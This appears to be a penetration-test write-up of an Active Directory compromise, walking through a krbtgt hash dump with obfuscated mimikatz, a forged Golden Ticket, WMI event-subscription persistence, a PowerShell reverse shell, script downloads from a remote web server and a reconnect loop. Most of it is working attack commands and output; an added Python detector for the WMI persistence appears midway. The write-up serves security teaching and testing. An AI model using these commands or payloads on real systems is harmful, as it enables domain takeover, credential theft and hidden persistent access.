Corporate Smartphone Security (C) - Aiming at the domain controllers and going for a Golden Ticket. Before leaving the internal network we decided to dump the hashes from the domain controller, in particular those of the Kerberos service account (krbtgt), in order to create a Golden Ticket *.
A Golden Ticket is a forged TGT (Ticket Granting Ticket); similarly, a Silver Ticket is a forged TGS (a service ticket, as issued by the Ticket Granting Service).
A Golden Ticket attack lets us forge a Kerberos TGT offline, gaining unauthorized access and impersonating any domain user. On top of that, the ticket stays valid for ten years from its creation, even if the domain administrator's credentials have changed in the meantime. An excellent way of keeping our privileges, isn't it?
In order to accomplish this task, we need:
krbtgt hash
Domain SID
User name (here Administrator)
Domain name (here SUPERCOMPANY)
In the same way as before (port forwarding on SRVWSUS, the improved smbexec, and so on), we now have a PowerShell session with local administrator privileges on the domain controller.
We ran our obfuscated mimikatz to dump the Active Directory secrets and saved them to hash.txt:
invoke-mymy -command '"privilege::debug" "lsadump::lsa /inject"' > hash.txt
The mimikatz script had the auto-invoke command removed from the end of the file. We exfiltrated the hash file to our web server; this was its content:
RID  : 000001f6 (502)
User : krbtgt
 * Primary
    LM   :
    NTLM : 3003567af268a4aXXXXXXXXXXXXXXXXX
Using the Get-ADDomain cmdlet, which is automatically available on domain controllers, we got the domain SID:
PS C:\test> get-addomain

AllowedDNSSuffixes         : {}
ChildDomains               : {}
ComputersContainer         : CN=Computers,DC=supercompany,DC=local
DeletedObjectsContainer    : CN=Deleted Objects,DC=supercompany,DC=local
DistinguishedName          : DC=supercompany,DC=local
DNSRoot                    : supercompany.local
DomainControllersContainer : OU=Domain Controllers,DC=supercompany,DC=local
DomainMode                 : Windows2012R2Domain
DomainSID                  : S-1-5-21-3534665177-2148510708-2241433719
...
Note: the domain SID can also be derived from the SID of the Administrator account (RID 500) obtained with mimikatz, by dropping the last component:
S-1-5-21-3534665177-2148510708-2241433719-500
Now it's time to create our Golden Ticket:
invoke-mymy -command '"privilege::debug" "kerberos::golden /admin:Administrator /domain:supercompany.LOCAL /sid:S-1-5-21-3534665177-2148510708-2241433719 /krbtgt:3003567af268a4a94e26f410e84353f1 /ticket:admin.krb"'
  .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */
mimikatz(powershell) # privilege::debug
Privilege '20' OK

mimikatz(powershell) # kerberos::golden /admin:Administrator /domain:supercompany.LOCAL /sid:S-1-5-21-3534665177-2148510708-2241433719 /krbtgt:3003567af268a4a94e26f410e84353f1 /ticket:admin.krb
User      : Administrator
Domain    : supercompany.LOCAL (SUPERCOMPANY)
SID       : S-1-5-21-3534665177-2148510708-2241433719
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 3003567af268a4a94e26f410e84353f1 - rc4_hmac_nt
Lifetime  : 2/17/2017 4:02:10 PM ; 2/17/2027 4:02:10 PM ; 3/3/2027 4:02:10 PM
-> Ticket : admin.krb

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
The ticket was saved to the file admin.krb without any problem; we then retrieved the file, to be used later.
Maintaining access
Before leaving the system we had to set up a way to keep access to the server from the public network for later use. Staying undetected at this step is not easy: even a novice system administrator may find some clues.
We chose a more sophisticated approach that takes advantage of WMI, using an InstanceModificationEvent.
Whenever a WMI object instance changes, an __InstanceModificationEvent is raised. We filter these events on the system uptime, so that between 200 and 300 seconds after system startup a CommandLineEventConsumer bound to the filter is triggered.
On the SRVWSUS server we ran the following commands:
$filterName = "JustForTestFilter"
$consumerName = "JustForTestConsumer"
$exePath = "C:\windows\help\windows\indexstore\r.bat"
# Fire once, while the uptime reported by the PerfOS counter is between 200 and 300 seconds after boot
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 300"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName; EventNameSpace="root\cimv2"; QueryLanguage="WQL"; Query=$Query} -ErrorAction Stop
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName; ExecutablePath=$exePath; CommandLineTemplate=$exePath}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter; Consumer=$WMIEventConsumer}
Then, in that hidden Windows folder, we created r.bat with the following content:
powershell -executionpolicy bypass -windowstyle hidden -f C:\windows\help\windows\indexstore\r.ps1
The content of the r.ps1 file is:
# connect-back host left blank in the original
$c = New-Object System.Net.Sockets.TCPClient('', 443);
$s = $c.GetStream(); [byte[]]$b = 0..65535 | % {0};
while (($i = $s.Read($b, 0, $b.Length)) -ne 0) {;
  $d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b, 0, $i);
  $sb = (IEX $d 2>&1 | Out-String);
  $sb2 = $sb + 'PS ' + (pwd).Path + '> ';
  $sb = ([text.encoding]::ASCII).GetBytes($sb2);
  $s.Write($sb, 0, $sb.Length);
  $s.Flush()};
$c.Close()
This guarantees us a remote shell running with local SYSTEM privileges on SRVWSUS after every reboot.
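On the defensive side, as an added example that is not part of the original post: this Python check correlates WMI subscription telemetry such as Sysmon event IDs 19, 20 and 21 (filter, consumer and filter-to-consumer binding) and flags a command-line consumer bound to a filter that fires on a post-boot uptime window, which is exactly the subscription created above. The events are constructed samples reduced to the fields the check needs, the consumer Type labels are assumed, and the Windows default SCM Event Log subscription is included as a benign control.

```python
import re

# Constructed events modelled on Sysmon WmiEvent records (ID 19 filter, 20 consumer,
# 21 filter-to-consumer binding), reduced to the fields the check needs. Not real telemetry:
# the first three mirror the subscription created above, the last three are the benign
# SCM Event Log subscription present by default in root\subscription.
EVENTS = [
    {"id": 19, "Name": "JustForTestFilter", "EventNamespace": "root\\cimv2",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "
              "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 "
              "AND TargetInstance.SystemUpTime < 300"},
    {"id": 20, "Name": "JustForTestConsumer", "Type": "Command Line",
     "Destination": "C:\\windows\\help\\windows\\indexstore\\r.bat"},
    {"id": 21, "Filter": "JustForTestFilter", "Consumer": "JustForTestConsumer"},
    {"id": 19, "Name": "SCM Event Log Filter", "EventNamespace": "root\\cimv2",
     "Query": "select * from MSFT_SCMEventLogEvent"},
    {"id": 20, "Name": "SCM Event Log Consumer", "Type": "NT Event Log", "Destination": ""},
    {"id": 21, "Filter": "SCM Event Log Filter", "Consumer": "SCM Event Log Consumer"},
]

# A filter that watches SystemUpTime on __InstanceModificationEvent is the classic
# "run something shortly after boot" trigger; legitimate software rarely needs it.
BOOT_WINDOW = re.compile(r"__InstanceModificationEvent.*SystemUpTime\s*[<>]=?\s*\d+", re.I | re.S)
SCRIPT_EXT = (".bat", ".cmd", ".ps1", ".vbs", ".js")
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\program files\\", "c:\\program files (x86)\\")


def suspicious_bindings(events):
    """Return (filter, consumer, reasons) for each binding that looks like persistence."""
    filters = {e["Name"]: e for e in events if e["id"] == 19}
    consumers = {e["Name"]: e for e in events if e["id"] == 20}
    hits = []
    for b in (e for e in events if e["id"] == 21):
        f, c = filters.get(b["Filter"]), consumers.get(b["Consumer"])
        # Only command-line consumers launch a program; the Type label is the one assumed
        # for Sysmon here, adjust it to your sensor's naming.
        if not f or not c or c["Type"] != "Command Line":
            continue
        reasons = []
        if BOOT_WINDOW.search(f["Query"]):
            reasons.append("filter triggers on a post-boot uptime window")
        dest = c["Destination"].lower()
        if dest.endswith(SCRIPT_EXT) or not dest.startswith(TRUSTED_DIRS):
            reasons.append("consumer runs %s from an untrusted location" % c["Destination"])
        if reasons:
            hits.append((b["Filter"], b["Consumer"], reasons))
    return hits
```

The same correlation can be run directly against a live host by enumerating __EventFilter, CommandLineEventConsumer and __FilterToConsumerBinding in root\subscription and feeding the results in the same shape.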
Finally we tested the Golden Ticket we had obtained. Remember the admin.krb file?
From the local-administrator shell on SRVWSUS we downloaded admin.krb, configured port forwarding, and uploaded the script r3.ps1, which connects back to port 9000 of SRVWSUS.
Now we load the ticket into our session:
PS C:\tmp> Invoke-mymy -command '"kerberos::ptt admin.krb"'
mimikatz(powershell) # kerberos::ptt admin.krb

* File: 'admin.krb': OK
Using klist we can list the Kerberos tickets loaded in our session:
PS C:\tmp> klist

Current LogonId is 0:0x3e7

Cached Tickets: (1)

#0>     Client: Administrator @ supercompany.LOCAL
        Server: krbtgt/supercompany.LOCAL @ supercompany.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 2/17/2017 1:02:10 (local)
        End Time:   2/17/2027 1:02:10 (local)
        Renew Time: 2/18/2027 1:02:10 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:
Success, the ticket was loaded!
For the next step we used the Windows wmic.exe utility, the WMI command-line interface, which can access remote systems using Kerberos credentials.
We copied r3.ps1 to the domain controller without any problem, simply because the Administrator's ticket was loaded in our session!
PS C:\tmp> copy c:\tmp\r3.ps1 \\SRVDC1\C$\windows\temp\r3.ps1
Then run:
PS C:\tmp> wmic /authority:"kerberos:SUPERCOMPANY\SRVDC1" /node:SRVDC1 process call create "powershell -executionpolicy bypass -windowstyle hidden -f c:\windows\temp\r3.ps1"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 4528;
        ReturnValue = 0;
};
We waited and waited for a while before we saw the shell from SRVDC1 on our computer:
PS C:\Windows\system32> whoami
supercompany\administrator
This will work even if the Administrator's password has changed.
On the potential dangers of a Golden Ticket, I have a few words to say:
Forged Kerberos tickets are very difficult to detect (https://adsecurity.org/?p=1515).
The only way to invalidate them is to reset the krbtgt password twice, but this may have a serious impact on the Active Directory infrastructure.
Last thing to do
Remember how we got the first remote PowerShell shell on SRVWSUS?
We ran a remote command from the intranet server, forwarding the connection through the Meterpreter session on the Android phone. What if we lose the remote PowerShell shell and can never connect to the victim again? Game over...
We need to add persistent access to the SRVWSUS shell!
How? By setting up access to SRVWSUS from the Tomcat webshell:
# 1st smbexec command (download URL host left blank in the original):
IEX (New-Object Net.WebClient).DownloadFile(`'http:///r1.ps1`', `'c:\tmp\r1.ps1`')
# 2nd smbexec command:
IEX (New-Object Net.WebClient).DownloadFile(`'http:///r1.bat`', `'c:\tmp\r1.bat`')
# 3rd smbexec command:
'cmd /c c:\tmp\r1.bat'
What does r1.bat contain?
@echo off
:loop
powershell -executionpolicy bypass -windowstyle hidden -f c:\tmp\r.ps1
timeout /t 10
goto loop
Not elegant, but effective: once the connection is lost, it waits ten seconds and reconnects.
Of course we could encrypt and obfuscate all the .ps1 scripts, but we just wanted to show how it works.
Conclusion
This is our job and we did not invent anything new, but we achieved a lot with Windows built-in features and some scripting. Sometimes no magic tools are needed, just the KISS principle.